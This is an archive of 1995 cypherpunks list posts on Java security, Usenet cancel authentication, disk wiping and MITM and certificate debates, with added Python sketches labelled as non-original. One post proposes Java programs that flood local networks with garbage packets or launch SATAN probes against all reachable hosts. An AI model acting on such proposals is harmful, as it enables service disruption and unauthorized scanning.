From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 18:13:28 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <Pine.SOL.3.91.951009171543.13562H-100000@chivalry>
Message-ID: <9510100110.AA25989@all.net>
MIME-Version: 1.0
Content-Type: text


> > taken on an impossible task. Marcus Ranum has noted that you can't
> > trust a program that's bigger than a couple of pages long, and I

Marcus agreed with a position founded on the work in the late 70s and
early 80s by many researchers on proving the security of operating
systems under the Bell-Lapadula model.  The main result I recall is that
a Cray-1 took 24 hours to prove the Simple Security Property about a
100-line limited-Pascal program used as the core of (I think it was)
UCLA-secure Unix.  Complexity goes up quickly with program size, and this
property is only one of many you might like to prove.

> For the general case this is true. To be able to trust larger systems, you
> need to not only be able to trust the individual 2 pagers, but to also be
> able to show that composing the sub units doesn't lose whatever property
> you're trying to do.
...
> Distributed co-operative theorem proving, anyone?

Let's go - I will provide the distribution mechanisms, and I think I
know someone who is interested in the theorem proof side.  I know of
several experts on theorem proving who may well pitch in.  What program
do you want to prove secure next (we're currently finishing up my secure
Web server)?

...
> Real point of the message:
> 
> In my previous message, I left out some fundamental parts of the run-time 
> that need to be looked at carefully. The garbage collection needs to be 
> examined carefully. Normally GC algorithms are formally derived, so it's 
> the implementation that needs to be checked for. Holes in the GC may be 
> too unpredictable to exploit for anything but core-dumping, especially since 
> java uses a mark-sweep conservative collector. 

The core dumping shows that Java can ALSO write files into the file
system, something it was claimed to NEVER be able to do! If you could
get the right name for the core file, and set up the first few bytes
right, ... 

> A more promising area of attack might be the Thread system. If the thread
> system can be confused, it might be possible to have an untrusted app
> start executing in the context of a trusted thread. This may or may not 
> be exploitable, depending on how much of the untrusted threads context 
> gets held over (call stack, etc), but could be fun if it works.

Why not start much simpler.  Write a Java program to disrupt services by
flooding the local network with garbage packets - or with some sort of
request it lets you write. How about a Java program that launches SATAN
probes against all reachable hosts?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 9 Oct 95 19:24:06 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <9510100110.AA25989@all.net>
Message-ID: <Pine.SUN.3.90.951009211225.21188A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Mon, 9 Oct 1995, Dr. Frederick B. Cohen wrote:

> The core dumping shows that Java can ALSO write files into the file
> system, something it was claimed to NEVER be able to do! If you could
> get the right name for the core file, and set up the first few bytes
> right, ... 
> 

Please stop and go read the documentation and papers off Sun's web site.
Whoever said that Java can't write to files is not in their right mind.
Those who believe it are more so. Java is a programming language. It can
certainly write to files. Now whatever an interpreter (in this case called
by HotJava or Netscape) allows the application to do is another thing.
You can as well distribute binary C programs but before running them
try to examine them to see if they access the filesystem. (You might even hack
your kernel or libraries to stop any process with a certain flag from doing
so). Java just makes this easier. You can even set up the HotJava browser
to do no security check at all. It all depends on the security model you choose.
Ditto for net connections or anything else.

Now if all of you would please go use the product or learn more about it 
before bashing it I would not have to waste my time replying to this.

> Why not start much simpler.  Write a Java program to disrupt services by
> flooding the local network with garbage packets - or with some sort of
> request it lets you write. How about a Java program that launches SATAN
> probes against all reachable hosts?
> 

See above. Read the hotjava man page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Date: Mon, 9 Oct 95 13:57:45 PDT
To: cypherpunks@toad.com
Subject: GISA budget: millions for cryptanalytic machine
Message-ID: <m0t2Opo-000BIgC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



According to `die tageszeitung' of 7 Oct 1995, last year the German
Information Security Agency was granted several million marks for buying a
computer to decrypt telecommunications traffic for the secret service BND.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 18:41:09 PDT
To: mkj@october.ducktown.org
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <199510091458.AA00712@october.ducktown.org>
Message-ID: <Pine.SUN.3.91.951009213604.29453B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Oct 1995 mkj@october.ducktown.org wrote:

> We mustn't forget that, until very recently, strong, widespread
> privacy has been humanity's "default" condition.

Not much privacy in village or tribal life.  Even neighborhoods of 
earlier cities weren't very private.  Neighbors always knew your business.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Mon, 9 Oct 95 22:39:08 PDT
To: jlasser@rwd.goucher.edu
Subject: Re: Crypto's Role in Evil?
Message-ID: <9510100538.AA05032@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jon Lasser 

(1) It is impossible to stop these technologies; someone on the list 
recently reminded us that a bright fourteen year old could reproduce the 
basic functionality of PGP in a brief period of time.  The mathematics 
of, say, RSA, are fairly basic.  I think it's unreasonable to outlaw 
multiplication of prime numbers, don't you?
..........................................

Uh-huh, yes, I think it's dumb to think of outlawing the right of mental 
creatures to engage their faculties to their full potential, especially in a 
country which defined encroachments upon it as a crime.

"Unreasonable" people will always try to get something for nothing, with 
nothing, while in conflict with those who could & would develop the means to 
deliver it.

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Mon, 9 Oct 95 22:53:45 PDT
To: cypherpunks@toad.com
Subject: Fully Qualified Domain Name
Message-ID: <95Oct9.225333pdt."16398(3)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Was there a recent discussion here about how to write a piece of UNIX code that
discovers a Fully Qualified Domain Name of the machine running the code?  If
so, I'd appreciate pointers to or copies of the good parts (I scanned
http://www.hks.net/cpunks/cpunks-19/subject.html and didn't find what I'm
seeking).  If not, sorry for wasting your time.

Thanks,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Oct 95 22:57:23 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510100557.WAA10779@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>>PC Tools has a wipe program that will either wipe individual files, or
>>wipe all unallocated diskspace. It also allows you to choose the level
>>of wipe (single overwrite, multiple, etc).

At 12:24 PM 10/9/95 -0400, Robert Hettinga wrote:
>There has been considerable discussion on the MCIP list about how most
>*Mac* programs that purport to do this, like Burn, for example, leave stuff
>over in disk blocks. My understanding is that this is not a trivial
>problem, and it occurs in MUSH-DOS as well....

I wrote the disk wipe program in PC Tools.  It really no kidding 
wipes stuff.

The only way they can recover the data is if they take a scanning tunneling
microscope to the disk platter, and even then they could only recover small
random fragments.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 9 Oct 95 22:44:47 PDT
To: cypherpunks@toad.com
Subject: Re: Making it more difficult to forge cancels (was: Re: FORGED CANCELS of posts on n.a.n-a.m)
In-Reply-To: <199510051540.IAA23612@ix.ix.netcom.com>
Message-ID: <cgJqcD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <4571p9$kf5@kruuna.helsinki.fi>, wirzeniu@cc.Helsinki.FI (Lars Wirzenius) writes:
>dlv@bwalk.dm.com (Dr. Dimitri Vulis) suggests that cancels be authenticated
>so that only the actual poster could cancel them.  He notes that this
>would make it impossible for moderators to cancel forgeries, but says
>they could use NoCeM notices instead.
>
>Speaking as the moderator of comp.os.linux.announce: No way!
>
>NoCeM doesn't work, since most people have never even heard of it.
[Valid criticisms of NoCeM skipped]
>(Approval forging can fairly easily be made very difficult: the moderator
>digitally signs the articles, and all major news servers are fixed to
>drop all other articles on the floor.  The problems with this approach
>are that on the one hand, upgrading a lot of news servers to the new
>software is a bit of work, and on the other hand, even digital signatures
>may be, or become illegal in parts of the world.  But that just might
>be a reason to implement it now.  There's work being done on it, as a
>matter of fact.)

Sorry for the belated follow-up -- I was far away, and now have a backlog to
sort out.

I've discussed the Hujskonen-Franz proposal some time ago with the beautiful
Simona Nass from Panix and the Society for Electronic Access, and she made the
following suggestion: let each party that wants to be able to authorize cancels
add their own separate Cancel-lock: headers. The cancel/supersede should be
honored if its Cancel-key header matches any one of the Cancel-lock challenges.

I think adding multiple Cancel-lock: headers, any single one of which needs to
be matched, to the Hujskonen-Franz proposal will address _some_ of the concerns
expressed by Bill Stewart last week, by Lars Wirzenius, and by CancelMoose
him/herself in http://www.cm.org/about-cancels.html about the ability of
moderators to cancel postings in their own newsgroups.

Scenario 1.

Alice posts an article from a computer owned by Bob, an Internet provider.
Bob wants to reserve the right to cancel Alice's account and Alice's Usenet
postings without Alice's permission if Alice misbehaves (e.g., spams).

Alice posts:
]From: alice@bob's.box
]Newsgroups: alt.sex
]Subject: Call me at 1-800-xxx-xxxx for a good time
]Message-id: X (123@bob's.box)
]Cancel-Lock: M2_a

where M2_a is the one-way H(X + M1_a), and M1_a is H of the article and of
Alice's secret passphrase.

Bob, being the sysadmin and the owner of his box, configures his news-posting
software to add automatically a second challenge, in addition to Alice's:

]Cancel-Lock: M2_b

where M2_b is the one-way H(X + M1_b), and M1_b is H of Alice's article and of
_Bob's_ secret passphrase.

Bob asks Alice nicely to cancel the article, since such ads are not appropriate
on alt.sex. Alice may comply and issue a cancel with the header

]Cancel-Key: M1_a

which will be honored. But if Alice refuses, Bob can issue a cancel/supersede
with the header:

]Cancel-Key: M1_b

which should likewise be honored because H(X + M1_b) matches one of the two
challenges in the posted article.

Note 1: If Alice doesn't add a Cancel-Lock, and Bob does, then Alice won't be
able to cancel her own article.

Note 2: It may be a good idea to put comments on the challenges:

]From: alice@bob's.box
]Newsgroups: alt.sex
]Subject: Call me at 1-800-xxx-xxxx for a good time
]Message-id: X
]Cancel-Lock: M2_a ; alice@bob's.box
]Cancel-Lock: M2_b ; root@bob's.box


Scenario 2.

Alice submits an article to Bob, a moderator of a moderated newsgroup:

]Newsgroups: rec.food.cannibalism
]Subject: How to cook elementary school children
]Message-id: X
]Cancel-Lock: M2_a

where M2_a again is H(X + M1_a), and M1_a is H of the article and of Alice's
secret passphrase.

Bob, being either the sole moderator, or a team member, adds an approval and a
second challenge, in addition to Alice's:

]Approved: Bob
]Cancel-Lock: M2_b

where M2_b is the one-way H(X + M1_b), and M1_b is H of Alice's article and of
a secret passphrase used by Bob or by the entire moderating team.

Later Bob can cancel this article by specifying
]Cancel-Key: M1_b
Alice too can cancel this article by specifying
]Cancel-Key: M1_a
(unless Bob has stripped Alice's challenge before posting her submission)
and Alice's sysadmin can cancel it too if he added his own challenge (third).

I personally don't think that Bob should be allowed to cancel Alice's article
after he approved it, but that's between Alice and Bob; if she doesn't like it
either, she can post her articles elsewhere.

Now, if Alice injects an article with "Approved:" and entirely bypasses Bob,
(Lars Wirzenius's main concern), then Bob should post a PGP-signed NoCeM notice
and try to yank Alice's feed, or have the site that continues to permit Alice
to do this to be widely aliased. IMVHO, when this happens, the problem is
much deeper than just having the unauthorized article removed.

If and when NoCeM becomes widely accepted, most sites can be expected to honor
signed 'Action: hide' requests from newsgroup moderators in their groups.


Scenario 3.

Alice provides dial-up Usenet feed to/from several small sites run by Bob,
Charles, and Dan. Their domains point to Alice via MX. Alice knows that if one
of them spams Usenet, she'll be flamed and mailbombed. Alice adds her own
"Cancel-Lock:" to each article she receives from these sites before feeding
them to the rest of Usenet. Later she can cancel whatever articles have
originated at B, C, D, and passed through her site.

If Bob, Charles, and Dan don't want Alice to be able to cancel their articles,
or if Alice adds other headers in the articles that pass through her site that
they don't like, then they can look for another feed.


Please note that I don't claim credit for these proposals: I'm just repeating
others' ideas which I happen to like a lot. I hope some civic-minded person(s)
will write patches for the common posting/server software, and compose an RFC
for the Cancel-Lock:/Cancel-Key: headers. One nice feature about the Hujskonen-
Franz proposal is that it can be adopted gradually: some sites can continue to
honor all cancels, while others can choose to start honoring only authenticated
cancels, and to help track down forged cancels that fail authentication.

P.S. I saw a NoCeM notice from Chris Lewis with Action:hide/Type: copyright,
for someone's Usenet article that, I think, quoted his private e-mail (?).
I wonder if CancelPoodle's NoCeM's for the Top $ekret $ientology $tuff will
follow soon. :) (And the NoCeM documents should probably be updated to
support new types: copyright, libel, flame, inappropriate, ... :) :)

:-) ObMoosePoem: :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-)
Moose, Moose, wonderful Moose!
Gets rid of nasty spam.
So fond of the Moose I am.
Hooray for the wonderful Moose!
:-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
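
Scenario 3 and the gradual-adoption point above, as an added sketch that is not part of the original post or of any news software. It assumes a lock is the SHA-256 hash of a per-article key derived by HMAC from a site secret (the construction later written up in RFC 8315, simplified here); the function names, the two policies and the sample article are constructed.

```python
import base64
import hashlib
import hmac


def _b64(raw):
    return base64.b64encode(raw).decode("ascii")


def cancel_key(site_secret, message_id):
    """Derive the per-article key from one site secret, so nothing is stored per article."""
    return _b64(hmac.new(site_secret, message_id.encode(), hashlib.sha256).digest())


def cancel_lock(key):
    """The public lock is a hash of the key; publishing it does not reveal the key."""
    return "sha256:" + _b64(hashlib.sha256(key.encode()).digest())


def add_lock(article, site_secret):
    """Return a copy of the article with this site's lock appended to Cancel-Lock."""
    out = dict(article)
    lock = cancel_lock(cancel_key(site_secret, article["Message-ID"]))
    out["Cancel-Lock"] = " ".join(article.get("Cancel-Lock", "").split() + [lock])
    return out


def make_cancel(article, site_secret, sender):
    """Build a cancel that reveals the key this site would have used for the article."""
    return {
        "From": sender,
        "Control": "cancel " + article["Message-ID"],
        "Cancel-Key": "sha256:" + cancel_key(site_secret, article["Message-ID"]),
    }


def key_opens_lock(article, cancel):
    """True if any key in the cancel hashes to any lock on the original article."""
    locks = article.get("Cancel-Lock", "").split()
    for field in cancel.get("Cancel-Key", "").split():
        scheme, _, key = field.partition(":")
        if scheme != "sha256":
            continue  # unknown scheme: cannot authenticate with it
        candidate = cancel_lock(key)
        if any(hmac.compare_digest(candidate, lock) for lock in locks):
            return True
    return False


def process_cancel(article, cancel, policy, audit_log):
    """'legacy' sites honor every cancel; 'authenticated' sites need a matching key.

    Either way a cancel that fails authentication is logged, so that sites can
    help track down forged cancels.
    """
    if cancel.get("Control") != "cancel " + article["Message-ID"]:
        return "ignored"
    if key_opens_lock(article, cancel):
        return "honored"
    audit_log.append((article["Message-ID"], cancel.get("From")))
    return "honored" if policy == "legacy" else "rejected"


def demo():
    """Constructed run: Bob posts through Alice's feed, then three parties try to cancel."""
    bob, alice, forger = b"constructed-bob-secret", b"constructed-alice-secret", b"guess"
    art = {"From": "bob@b.example", "Message-ID": "<constructed.1@b.example>"}
    art = add_lock(art, bob)    # Bob's own posting software
    art = add_lock(art, alice)  # Alice, before feeding the article to the rest of Usenet
    attempts = [("alice", alice, "authenticated"), ("bob", bob, "authenticated"),
                ("forger", forger, "authenticated"), ("forger", forger, "legacy")]
    log, verdicts = [], {}
    for who, secret, policy in attempts:
        cancel = make_cancel(art, secret, who + "@constructed.example")
        verdicts[(who, policy)] = process_cancel(art, cancel, policy, log)
    return art, verdicts, log


if __name__ == "__main__":
    article, verdicts, log = demo()
    print(article["Cancel-Lock"])
    for attempt, verdict in verdicts.items():
        print(attempt, verdict)
    print("failed authentication:", log)
```

Because the article carries both locks, either Bob or Alice can cancel it, which is exactly the trade-off Bob accepts by taking a feed from Alice.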




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 9 Oct 95 15:42:04 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510092114.AA24726@alpha>
Message-ID: <21628.9510092240@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



I have been following this MITM argument, and find the reasons for
the presentation of some of the arguments confusing.

I'm near certain every one of those arguing understands public key, and
the use of out of band channels (physical meeting, paper mail,
alternate information provider, plastering public key hashes (eg PGP
fingerprints) everywhere by all comms mediums available, etc) to build
a web of trust, and hence reduce chances of a MITM.

I think I have seen two roughly equivalent views of the relationships
between keys and names presented, and these could be summarised:

a) a person has-a key

 ("has-a" in an entity relationship diagram sense -- it is something
  that a person possesses; that person may or may not choose to go by
  their true name, whilst using that key)

b) a key has attributes one of which could (optionally) be a true name

both cases use the same techniques of using all available out of band
comms channels, to make life as tough as possible for the MITM.

So far so good.

Now the puzzling stuff is people who appear to be arguing that MITM is
unimportant, and the whole thing revolves around some relativistic
world view, and it somehow doesn't matter if there is an eavesdropper
so long as you have not yet discovered this.

As it quite clearly does matter, and I can't see how that view
provides anything useful, I assume that there is some theoretical
point these people are trying to make which I fail to grasp.

Anyone care to fill me in as to what this concept is?

Perhaps the view is based on the fact that there are plenty of
situations where you don't care what an entity's name is, and hence
the attribute which should be under discussion is credit worthiness,
or reliability, but still you need to protect against MITM, using
whatever channels and means available.  I don't see how this alters
the argument.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Oct 95 20:51:59 PDT
To: cypherpunks@toad.com
Subject: Re: Java bugs found?
Message-ID: <199510100349.XAA20771@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510100145.SAA00403@lux.reich.com>, Richard_Reich@reich.com
(Richard Reich) wrote:

> After I noticed the file had been pulled, I recovered its contents from my 
> netscape cache (thanks, netscape!):
> 
>   Netscape was notified on Sunday 10/8/95 by Sun Microsystems that there
> is a serious security hole in their Java system [...]

So much for guaranteed security. There is one question on my mind. Why do
today's programs have to try to do it all? Why the heck does a
wordprocessor have to ship with a compiler built in? Not to mention that
there seems to be a disturbing tendency to "feature" automatic execution
of arbitrary code submitted by third parties.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHntWioZzwIn1bdtAQHqMgGAmc0lpXKiDZPCxZxFmQOKvgwm8Y/RRFca
rTfkfyvbdofFklrivaMy+tuuLddZRHo8
=lnto
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 00:21:26 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510100721.AAA20944@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>There has been considerable discussion on the MCIP list about how most
>*Mac* programs that purport to do this, like Burn, for example, leave stuff
>over in disk blocks. My understanding is that this is not a trivial
>problem, and it occurs in MUSH-DOS as well....

Doing it _right_ is not a trivial job.  Consider disk controllers that
map out bad blocks so the OS never needs to see them - if you're trying
to remove highly classified data, the fact that Diskwipe won't ever see them
might be a serious problem, even if it is close enough for government work.

For a more realistic scenario, consider Stacker and other disk-compression
software; you don't know what physical blocks the file was written on, or
whether overwriting the logical blocks of the file will actually write to the
same physical blocks.  In some cases you can assume that it probably won't.
You also can't expect to
write large blocks of 1s or 0s over the disk, because disk compression will
turn them into small blocks with run-lengths or equivalent.  (Writing PRNG
random noise will do, or you can generate counter-based patterns that may work,
or do something cryptographically strong if you want to take the time.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
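
The compression problem described above, measured in an added example (not from the original post): zlib stands in for Stacker's compressor, and the sample file, the pattern names and `physical_coverage` are constructed for illustration. It also shows that a naive repeating counter compresses almost as well as all-zero fill, while a counter run through a hash does not.

```python
import hashlib
import os
import zlib


def zeros(n):
    return bytes(n)


def ones(n):
    return b"\xff" * n


def byte_counter(n):
    """Naive counter pattern: 0, 1, ..., 255, 0, 1, ... (repeats every 256 bytes)."""
    return bytes(i & 0xFF for i in range(n))


def hashed_counter(n, seed=b"constructed wipe seed"):
    """Counter fed through SHA-256: reproducible, but it looks like noise to a compressor."""
    out = bytearray()
    block = 0
    while len(out) < n:
        out += hashlib.sha256(seed + block.to_bytes(8, "big")).digest()
        block += 1
    return bytes(out[:n])


def prng_noise(n):
    return os.urandom(n)


PATTERNS = {
    "zeros": zeros,
    "ones": ones,
    "byte_counter": byte_counter,
    "hashed_counter": hashed_counter,
    "prng_noise": prng_noise,
}


def stored_size(data):
    """Bytes a compressing disk layer would physically store (zlib is the stand-in here)."""
    return len(zlib.compress(data, 6))


def physical_coverage(original, pattern_fn):
    """Upper bound on the share of the file's stored bytes that one wipe pass can hit.

    The pass writes len(original) logical bytes of the pattern. If those compress
    to fewer bytes than the file occupied, the remainder cannot have been
    overwritten. This is optimistic: it assumes the compressed pattern lands on
    the same physical blocks, which the post says you cannot count on.
    """
    wipe = pattern_fn(len(original))
    return min(1.0, stored_size(wipe) / stored_size(original))


def sample_file(lines=2000):
    """Constructed stand-in for a sensitive text file with some per-line variation."""
    rows = []
    for i in range(lines):
        tag = hashlib.sha256(str(i).encode()).hexdigest()[:8]
        rows.append(f"account 1234 memo {i:05d} ref {tag}\n")
    return "".join(rows).encode()


def survey(original=None):
    """Coverage bound for every pattern against one file."""
    original = sample_file() if original is None else original
    return {name: physical_coverage(original, fn) for name, fn in PATTERNS.items()}


if __name__ == "__main__":
    for name, cov in survey().items():
        print(f"{name:15s} covers at most {cov:6.1%} of the stored bytes")
```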





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 00:22:09 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
Message-ID: <199510100721.AAA20956@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:46 AM 10/9/95 -0700, Hal wrote:
>>This doesn't necessarily eliminate certificates - while you have a signed
>>statement from Alice's key that she uses Bank Account X, and a signed
>>statement from Alice's key authorizing transfer of $D from Bank Account X
>>to Bank Account Y, the Bank, or a customer, may refuse to accept the request
>>unless there's a signed statement from the Bank's key that Alice's key uses
>>Account X.  None of these need Alice's name, or for that matter the Bank's,
>>as long as there's also a signed attribute statement from the Bank's key
>>that it's a bank, etc.
>>The meaning of the certificates changes a bit, but there's still a certificate
>>from the bank binding Alice's Key to Alice's Bank Account.
>
>I can see using keys with attributes in this way, for credentials or as
>other forms of authorization.  But what about for communications privacy?
>What is the attribute that tells you that using this key will prevent
>eavesdropping?

What I was trying to get at with this post was that the assertion that key-
centered communications probably won't require certificates is incorrect.

As far as privacy goes, this set of keys and certifications lets you create
private communications (using signed DH, etc.) with the entity that owns
the private key for Bank Account X.  No, you don't know if that entity
is really Alice or really MITM; in fact you don't know Alice's name, if it's
done right.  You just know that the Bank says it will honor requests for money
from Bank Account X (assuming you know where to find the Bank, which is a
separate but similar problem.)  So assuming you're selling politically correct
widgets and not pharmaceuticals or financial privacy consulting services, you
probably don't care too much about who's on the other end - the person who's
giving you the money is the person you want to be talking to.

I'm not trying to define away the MITM problem - I think there _are_ times you
want to know for sure who you're talking to - but I think there are also a lot
of times that you really don't care, as long as you have continuity and
access to reputations of long-persisting identities, where the key is often
enough identification.

In the case of the Bank, the reason you trust the Bank isn't that you know
them physically (though it was interesting when I started dealing with a
local bank where the tellers knew me by name after only two or three visits);
knowing your local Savings and Loan by name doesn't guarantee you can get any
money out of them if there's a bank run, nor does it really guarantee that they
won't embezzle the funds and head for Argentina.  The reason you trust them
is that they (in this case the "they" identified by their key) are doing
business dealings with a lot of people and it's more profitable not to abscond.
And the reason you know it's really the Bank and not MITM is that they've
always identified themselves by their key from the beginning.
Just like the credit card whose owner we've been calling Alice has.
And because you've successfully withdrawn money from the Bank before,
and because you're clearing Alice's credit card transaction reasonably promptly.

Checks and credit cards are especially good examples for this - the current
systems need your name on them, because your name and signature are the
closest they have to an authentication system.  However, with digital
signatures, the fact that you can sign a document verifiable by the public key
is all the authentication that's needed; your name isn't.  If the card has an
account number for convenience, and Alice substitutes Carol's account number
for hers on a statement, her signature won't match the public key the bank
wants on the request, and it'll bounce.  (In this case, the certificate
from the bank would probably include the account number as well as the key,
but it's not critical for on-line systems, just more efficient.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
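
The key-to-account binding described above, as an added example rather than anything from the original post. Textbook RSA over a SHA-256 digest stands in for a real signature scheme (toy key size, no padding), and the statement format, `check_transfer` and account Z (Carol's) are assumptions; no statement carries a name.

```python
import hashlib
import secrets

E = 65537  # public exponent shared by all toy keys


def _is_probable_prime(n, rounds=24):
    """Miller-Rabin primality test."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(2 + secrets.randbelow(n - 3), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    """Random prime p of the given size with gcd(E, p - 1) == 1."""
    while True:
        c = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if c % E != 1 and _is_probable_prime(c):
            return c


def keygen(bits=512):
    """Toy RSA key pair (public, private); illustration only, not for real use."""
    p, q = _random_prime(bits // 2), _random_prime(bits // 2)
    n = p * q
    return {"n": n, "e": E}, {"n": n, "d": pow(E, -1, (p - 1) * (q - 1))}


def _digest(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big")


def sign(priv, msg):
    return pow(_digest(msg), priv["d"], priv["n"])


def verify(pub, msg, sig):
    return pow(sig, pub["e"], pub["n"]) == _digest(msg)


def fingerprint(pub):
    """Short identifier for a key; this is the only 'identity' used below."""
    return hashlib.sha256(f"{pub['n']:x}:{pub['e']:x}".encode()).hexdigest()[:16]


def signed(priv, **attrs):
    """A statement is sorted key=value text plus a signature over that text."""
    body = "|".join(f"{k}={v}" for k, v in sorted(attrs.items())).encode()
    return {"body": body, "sig": sign(priv, body)}


def parse(statement):
    return dict(part.split("=", 1) for part in statement["body"].decode().split("|"))


def check_transfer(bank_pub, cert, request, signer_pub):
    """Accept only if the bank's key binds the debited account to the signing key."""
    if not verify(bank_pub, cert["body"], cert["sig"]):
        return "reject: certificate not signed by the bank's key"
    binding, wanted = parse(cert), parse(request)
    if binding.get("account") != wanted.get("debit"):
        return "reject: certificate is for a different account"
    if binding.get("key") != fingerprint(signer_pub):
        return "reject: signing key is not the key bound to the account"
    if not verify(signer_pub, request["body"], request["sig"]):
        return "reject: request signature does not verify"
    return "accept"


def demo():
    """Constructed cases: an honest transfer, a swapped account number, a forged cert."""
    (bank_pub, bank_priv), (alice_pub, alice_priv) = keygen(), keygen()
    (carol_pub, _), (mitch_pub, mitch_priv) = keygen(), keygen()
    cert_x = signed(bank_priv, account="X", key=fingerprint(alice_pub))
    cert_z = signed(bank_priv, account="Z", key=fingerprint(carol_pub))
    honest = signed(alice_priv, debit="X", credit="Y", amount="D")
    swapped = signed(alice_priv, debit="Z", credit="Y", amount="D")  # Carol's number
    fake_cert = signed(mitch_priv, account="X", key=fingerprint(mitch_pub))
    mitch_req = signed(mitch_priv, debit="X", credit="Y", amount="D")
    return {
        "honest": check_transfer(bank_pub, cert_x, honest, alice_pub),
        "swapped, own cert": check_transfer(bank_pub, cert_x, swapped, alice_pub),
        "swapped, Carol's cert": check_transfer(bank_pub, cert_z, swapped, alice_pub),
        "swapped, Carol's key": check_transfer(bank_pub, cert_z, swapped, carol_pub),
        "cert from unknown key": check_transfer(bank_pub, fake_cert, mitch_req, mitch_pub),
    }
```

The last case only fails because the verifier already holds the bank's key; how it got that key is the separate but similar problem the post mentions.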





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 9 Oct 95 23:26:08 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510081722.KAA10011@jobe.shell.portal.com>
Message-ID: <199510100626.AAA20036@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

  Hal <hfinney@shell.portal.com> wrote:
> Eventually it seems that
> the MITM becomes enmeshed so deeply in his own lies that he would get
> caught.  If steps like these are taken successfully it should be
> reasonable to sign a nym's key, with the semantics being that either this
> is the real key of the sender, or he has a nearly omnipotent MITM
> surrounding him.


Let's think of ways to foil Mitch:


1.  Physical body (a.k.a. "True Name") mapping.
2.  The "overload his processors" trick.
3.  Sending hashes of future messages.
4.  Sending your public key to the Web O Trust via multiple, 
independent channels.
